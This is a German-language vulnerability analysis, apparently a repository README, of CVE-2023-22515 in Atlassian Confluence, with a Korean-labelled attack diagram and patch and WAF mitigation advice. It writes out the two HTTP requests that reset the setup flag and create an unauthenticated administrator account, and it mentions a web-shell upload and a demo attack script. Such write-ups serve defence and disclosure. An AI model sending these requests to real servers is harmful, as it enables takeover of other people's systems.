
Technische Analyse und Proof-of-Concept-Exploit für CVE-2023-22515, eine kritische Schwachstelle in der Zugriffskontrolle in Atlassian Confluence, die die Erstellung von Admin-Konten ohne Authentifizierung und die Kompromittierung des Systems ermöglicht.
[!IMPORTANT] Dringende Sicherheitswarnung: Diese Schwachstelle hat einen CVSS-Score von 10.0 (Critical) und ist damit eine Schwachstelle mit höchstem Risiko. Wenn Sie eine betroffene Version verwenden, ist ein sofortiger Patch erforderlich.
CVE-2023-22515 ist eine kritische Broken Access Control-Schwachstelle, die in Atlassian Confluence Data Center und Server entdeckt wurde. Angreifer können den Konfigurationsstatus des Servers ohne Authentifizierung remote manipulieren, Administrator-Konten erstellen und das System vollständig übernehmen.
| Kategorie | Details |
|---|---|
| Schwachstellen-ID | CVE-2023-22515 |
| Risikostufe | CRITICAL (CVSS 10.0) |
| Betroffene Versionen | 8.0.0 ~ 8.5.1 (genaue Versionen müssen überprüft werden) |
| Angriffsart | Authentifizierungsumgehung und Rechteausweitung |
Diese Schwachstelle wird ausgelöst, indem ein Angreifer über den Endpunkt /server-info.action den Wert bootstrapStatusProvider.applicationConfig.setupComplete auf false ändert.
sequenceDiagram
participant Attacker as 😈 공격자
participant Server as 🖥️ Confluence 서버
participant Config as ⚙️ 설정 관리자
Note over Attacker, Server: 1단계: 설정 상태 초기화 공격
Attacker->>Server: GET /server-info.action?setupComplete=false
Server->>Config: 메모리 상의 설정 완료 플래그 해제
Config-->>Server: 상태 변경 완료 (설치 모드로 전환)
Server-->>Attacker: HTTP 200/302 OK
Note over Attacker, Server: 2단계: 관리자 계정 생성
Attacker->>Server: POST /setup/setupadministrator.action<br/>(새로운 관리자 정보 전송)
Server->>Server: 보안 검증 우회 (설치 모드라 허용됨)
Server-->>Attacker: 계정 생성 성공 및 로그인
Note over Attacker, Server: 3단계: 시스템 장악 (RCE)
Attacker->>Server: 악성 플러그인 업로드 (Web Shell)
Server-->>Attacker: 원격 명령 실행 권한 획득
[!NOTE] Kernprinzip: Statt die persistente Konfigurationsdatei (
confluence.cfg.xml) zu verändern, wird der Laufzeitzustand im Speicher geändert, um die Zugriffskontrolllogik zu umgehen.
Die Ursache liegt in einer Schwachstelle in der Parameterbindung des XWork2-Frameworks sowie in der fehlenden Validierung externer Eingaben für die sensible Eigenschaft (setupComplete) in der Action-Klasse (ServerInfoAction) von Confluence.
Ein Angreifer kann den Server bereits mit einer einfachen HTTP-Anfrage lahmlegen.
1. Anfrage zum Zurücksetzen der Konfiguration:
GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false HTTP/1.1
Host: target-confluence.com
2. Anfrage zur Erstellung eines Administrator-Kontos:
POST /setup/setupadministrator.action HTTP/1.1
...
username=hacker_admin&password=P@ssw0rd123...
Mit dem zusammen mit diesem Bericht bereitgestellten Reproduktions-Kit (cve-2023-22515-repro) kann die Schwachstelle in einer sicheren Docker-Umgebung praktisch nachvollzogen werden.
Es ist ein Demo-Skript enthalten, mit dem der tatsächliche Hacking-Prozess im Terminal visuell verfolgt werden kann.
# 데모 실행 명령어
bash cinematic_pwn.sh
[!TIP] Das Demo-Skript führt einen Angriff gegen einen realen Server (
localhost:8090) durch und zeigt automatisiert den gesamten Ablauf: Es erstellt das Administrator-Konto und versucht anschließend die Anmeldung.
Die zuverlässigste Lösung ist ein Upgrade auf die von Atlassian bereitgestellten, korrigierten Versionen.
Falls ein Patch nicht möglich ist, blockieren Sie in Netzwerk-Sicherheitsgeräten (WAF, Load Balancer usw.) den Zugriff auf die folgenden URL-Muster.
*/setup/*CVE-2023-22515 ist eine kritische Schwachstelle: Sie ist sehr einfach auszunutzen und ermöglicht zugleich die vollständige Übernahme des Systems. Sicherheitsverantwortliche sollten umgehend Patches einspielen und die Systeme auf Anzeichen einer Kompromittierung überwachen.
Erstellt am: 2026-01-16 | Autor: Antigravity Security Analysis Team